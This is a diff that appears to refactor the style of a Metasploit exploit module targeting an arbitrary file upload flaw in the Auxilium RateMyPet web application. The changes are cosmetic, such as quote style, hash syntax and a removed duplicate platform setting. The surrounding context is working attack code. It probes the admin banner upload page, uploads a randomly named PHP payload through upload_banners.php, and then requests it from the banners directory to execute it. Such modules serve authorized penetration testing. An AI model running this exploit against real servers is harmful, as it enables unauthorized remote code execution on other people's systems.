@@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote
     super(
       update_info(
         info,
-        'Name' => "Auxilium RateMyPet Arbitrary File Upload Vulnerability",
+        'Name' => 'Auxilium RateMyPet Arbitrary File Upload Vulnerability',
         'Description' => %q{
           This module exploits a vulnerability found in Auxilium RateMyPet's. The site
           banner uploading feature can be abused to upload an arbitrary file to the web
@@ -33,7 +33,6 @@ class MetasploitModule < Msf::Exploit::Remote
         'Payload' => {
           'BadChars' => "\x00"
         },
-        'Platform' => %w{linux php},
         'Targets' => [
           [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
           [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
@@ -63,7 +62,7 @@ class MetasploitModule < Msf::Exploit::Remote
     res = send_request_raw({
       'uri' => normalize_uri("#{base}/admin/sitebanners/upload_banners.php")
     })
-    if res and res.body =~ /\<title\>Pet Rate Admin \- Banner Manager\<\/title\>/
+    if res and res.body =~ %r{<title>Pet Rate Admin - Banner Manager</title>}
       return Exploit::CheckCode::Detected
     else
       return Exploit::CheckCode::Safe
@@ -72,30 +71,30 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def upload_exec(base, php_fname, p)
     data = Rex::MIME::Message.new
-    data.add_part('http://', nil, nil, "form-data; name=\"burl\"")
-    data.add_part('', nil, nil, "form-data; name=\"alt\"")
+    data.add_part('http://', nil, nil, 'form-data; name="burl"')
+    data.add_part('', nil, nil, 'form-data; name="alt"')
     data.add_part(p, 'text/plain', nil, "form-data; name=\"userfile\"; filename=\"#{php_fname}\"")
-    data.add_part(' Upload', nil, nil, "form-data; name=\"submitok\"")
+    data.add_part(' Upload', nil, nil, 'form-data; name="submitok"')
 
     post_data = data.to_s
 
-    print_status("Uploading payload (#{p.length.to_s} bytes)...")
+    print_status("Uploading payload (#{p.length} bytes)...")
     res = send_request_cgi({
       'method' => 'POST',
       'uri' => normalize_uri("#{base}/admin/sitebanners/upload_banners.php"),
       'ctype' => "multipart/form-data; boundary=#{data.bound}",
-      'data' => post_data,
+      'data' => post_data
     })
 
-    if not res
-      print_error("No response from host")
+    if !res
+      print_error('No response from host')
       return
     end
 
     print_status("Requesting '#{php_fname}'...")
     res = send_request_raw({ 'uri' => normalize_uri("#{base}/banners/#{php_fname}") })
     if res and res.code == 404
-      print_error("Upload unsuccessful: #{res.code.to_s}")
+      print_error("Upload unsuccessful: #{res.code}")
       return
     end
 
@@ -109,7 +108,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     php_fname = "#{Rex::Text.rand_text_alpha(5)}.php"
 
-    p = get_write_exec_payload(:unlink_self => true)
+    p = get_write_exec_payload(unlink_self: true)
 
     upload_exec(base, php_fname, p)
   end
